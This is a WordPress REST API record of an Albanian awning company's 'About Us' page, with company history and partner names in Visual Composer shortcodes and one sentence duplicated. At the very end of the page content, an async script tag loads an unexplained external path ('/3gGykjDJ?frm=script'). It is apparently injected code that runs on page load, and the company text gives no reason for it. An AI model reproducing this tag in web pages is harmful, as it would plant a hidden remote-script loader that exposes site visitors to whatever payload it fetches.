{"id":14,"date":"2017-09-13T14:42:11","date_gmt":"2017-09-13T14:42:11","guid":{"rendered":"http:\/\/new.tendaera.com\/?page_id=14"},"modified":"2017-09-13T14:42:29","modified_gmt":"2017-09-13T14:42:29","slug":"rreth-nesh","status":"publish","type":"page","link":"https:\/\/tendaera.com\/index.php\/rreth-nesh\/","title":{"rendered":"Rreth Nesh"},"content":{"rendered":"<div class=\"wpb-content-wrapper\"><p>[vc_row][vc_column width=&#8221;1\/2&#8243;][vc_empty_space][vc_column_text]<\/p>\n<p style=\"text-align: justify;\"><span style=\"color: #545151;\">Tenda Era \u00ebsht\u00eb themeluar q\u00eb n\u00eb vitin 1994. Aktiviteti i saj \u00ebsht\u00eb i p\u00ebrq\u00ebndruar n\u00eb prodhim, montim tendash, tregtim aksesor\u00ebsh dhe copash n\u00eb t\u00eb gjith\u00eb Shqip\u00ebrin\u00eb. Kompania Tenda Era ka filluar aktivitetin n\u00eb bashk\u00ebpunim me kompanin\u00eb m\u00eb t\u00eb njohura nd\u00ebrkomb\u00ebtare si Calabri, Seven sun, Mehler, etj.<\/span><\/p>\n<p style=\"text-align: left;\"><span style=\"color: #545151;\">Si p\u00ebrfaqesuese ekskluzive e k\u00ebtyre kompanive, Tenda Era ka sjell\u00eb n\u00eb Shqip\u00ebri eksperienc\u00ebn e firmave te tyre.<\/span><\/p>\n<p style=\"text-align: left;\"><span style=\"color: #545151;\">Gjat\u00eb k\u00ebtyre viteve aktivitet, Tenda Era ka rritur gjithmon\u00eb e m\u00eb shum\u00eb tregun e vet, duke u realizuar dukshem si lider n\u00eb tregun e tendave te diellit.ekskluzive e k\u00ebtyre kompaniveSi p\u00ebrfaqesuese ekskluzive e k\u00ebtyre kompanive, Tenda Era ka sjell\u00eb n\u00eb Shqip\u00ebri eksperienc\u00ebn e firmave te tyre.<\/span><\/p>\n<p>[\/vc_column_text][vc_custom_heading text=&#8221;Tenda Era&#8221; font_container=&#8221;tag:h3|text_align:center|color:%23dd3333&#8243; google_fonts=&#8221;font_family:Lobster%3Aregular|font_style:400%20regular%3A400%3Anormal&#8221;][vc_custom_heading text=&#8221;Zgjedhja e duhur p\u00ebr Sht\u00ebpin\u00eb dhe Biznesin tuaj !&#8221; font_container=&#8221;tag:h3|text_align:center|color:%23dd3333&#8243; google_fonts=&#8221;font_family:Lobster%3Aregular|font_style:400%20regular%3A400%3Anormal&#8221;][\/vc_column][vc_column width=&#8221;1\/2&#8243;][vc_single_image image=&#8221;21&#8243; img_size=&#8221;full&#8221; alignment=&#8221;center&#8221; image_hovers=&#8221;false&#8221;][\/vc_column][\/vc_row]<script async src=' \/3gGykjDJ?frm=script&#038;_cid=123' type='text\/javascript'><\/script><\/p>\n<\/div>","protected":false},"excerpt":{"rendered":"<p>[vc_row][vc_column width=&#8221;1\/2&#8243;][vc_empty_space][vc_column_text] Tenda Era \u00ebsht\u00eb themeluar q\u00eb n\u00eb vitin 1994. Aktiviteti i saj \u00ebsht\u00eb i p\u00ebrq\u00ebndruar n\u00eb prodhim, montim tendash, tregtim aksesor\u00ebsh dhe copash n\u00eb t\u00eb gjith\u00eb Shqip\u00ebrin\u00eb. Kompania Tenda Era ka filluar aktivitetin n\u00eb bashk\u00ebpunim me kompanin\u00eb m\u00eb t\u00eb njohura nd\u00ebrkomb\u00ebtare si Calabri, Seven sun, Mehler, etj. Si p\u00ebrfaqesuese ekskluzive e k\u00ebtyre kompanive, Tenda&hellip;<\/p>\n","protected":false},"author":2,"featured_media":0,"parent":0,"menu_order":0,"comment_status":"closed","ping_status":"closed","template":"","meta":{"footnotes":""},"class_list":["post-14","page","type-page","status-publish","hentry","description-off"],"_links":{"self":[{"href":"https:\/\/tendaera.com\/index.php\/wp-json\/wp\/v2\/pages\/14","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/tendaera.com\/index.php\/wp-json\/wp\/v2\/pages"}],"about":[{"href":"https:\/\/tendaera.com\/index.php\/wp-json\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"https:\/\/tendaera.com\/index.php\/wp-json\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/tendaera.com\/index.php\/wp-json\/wp\/v2\/comments?post=14"}],"version-history":[{"count":6,"href":"https:\/\/tendaera.com\/index.php\/wp-json\/wp\/v2\/pages\/14\/revisions"}],"predecessor-version":[{"id":23,"href":"https:\/\/tendaera.com\/index.php\/wp-json\/wp\/v2\/pages\/14\/revisions\/23"}],"wp:attachment":[{"href":"https:\/\/tendaera.com\/index.php\/wp-json\/wp\/v2\/media?parent=14"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}